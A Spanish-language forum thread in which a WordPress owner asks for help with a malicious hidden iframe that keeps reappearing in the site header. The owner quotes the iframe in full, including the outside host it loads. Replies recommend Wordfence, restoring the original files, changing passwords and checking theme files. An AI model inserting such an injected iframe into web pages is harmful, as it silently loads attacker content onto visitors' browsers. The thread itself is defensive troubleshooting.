Ayuda urgente con Wordpress y codigo extraño

• Autor Autor Kenny H
  • Fecha de inicio Fecha de inicio

Kenny H

Delta
Social Media
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Hola amigos betas, vengo a pedirles de su ayuda derrepente a alguien ya le pudo haber pasado

en mi WP siempre me aparece un codigo malintencionado encima del </head>
<iframe src="http://ipadm.serveftp.com/jc/rss.php" width="2" height="2" frameborder="0"></iframe>

siempre lo borro pero al cabo de pocos dias vuelve a aparecer, si alguien podria darme algun consejo para eliminar para siempre ese codigo por favor
Espero puedan ayudarme
Saludos amigos.

- - - Actualizado - - -

alguien ayudeme 🙁

Revisa todos los archivos, es posible que hallan mas y un codigo que lo genere, aqui en el foro han dicho algunos plugins que te escanean el wordpress es bisca de virus puedes ver temas parecidos para encontrarlos ahora mismo no recuerod el nombre

gracias propa por la respuesta, efectivamente ando en eso y antes tambien use otro, tambien el antivirus de cpanel y no encontraron nada me parece muy raro.
espero poder encontrar alguna forma que me ayude a eliminar ese codigo malicioso 🙁

Usa Wordfence y restaura los archivos, tiene una opción para ello

Gracias ramon, tiene muy buena pinta parece un firewall completo para WP :encouragement:

Gracias ramon, tiene muy buena pinta parece un firewall completo para WP :encouragement:

Haz la restauración con Wordfence, porque eso de resinstalar desde Wordpress no hace nada, es un pequeño bug que me parece que nuncaaaaaaaaaaaa van a corregir...

Haz la restauración con Wordfence, porque eso de resinstalar desde Wordpress no hace nada, es un pequeño bug que me parece que nuncaaaaaaaaaaaa van a corregir...

ok amigo muchas gracia, ya lo voy viendo

- - - Actualizado - - -

Ramon, en el scaneo me detectó mas de 1000 incidencia, la mayoria de links sospechosos en comentarios, y otra partesita de archivos modificados con ese iframe malicioso... lo cual ando restaurando con el original 1 por 1, ¿existe alguna forma de hacer todo de un solo golpe?

PD: lo de restaurar el WP no sirve como dijiste... anteriormente hice esto y sigo con el problema :neglected:

Saludos amigos

Primero cambia tus contraseñas del host, luego la de WP de todos los usuarios.
Luego de eso realiza el chequeo de tu web

Revisate todos los archivos index.php de tu wordpress (incluidos los de los temas que tengas subidos)

Espero que ya hayas resuelto el problema.

Ya comprobaste los archivos originales de tu tema?

He leído que algunos temas gratuitos, e incluso pagos, tienen códigos de publicidad de otros websites para generar pagerank.

Generalmente colocan este código en el header y el footer y google penaliza al site anfitrión.

Espero que este no sea tu caso.

Saludos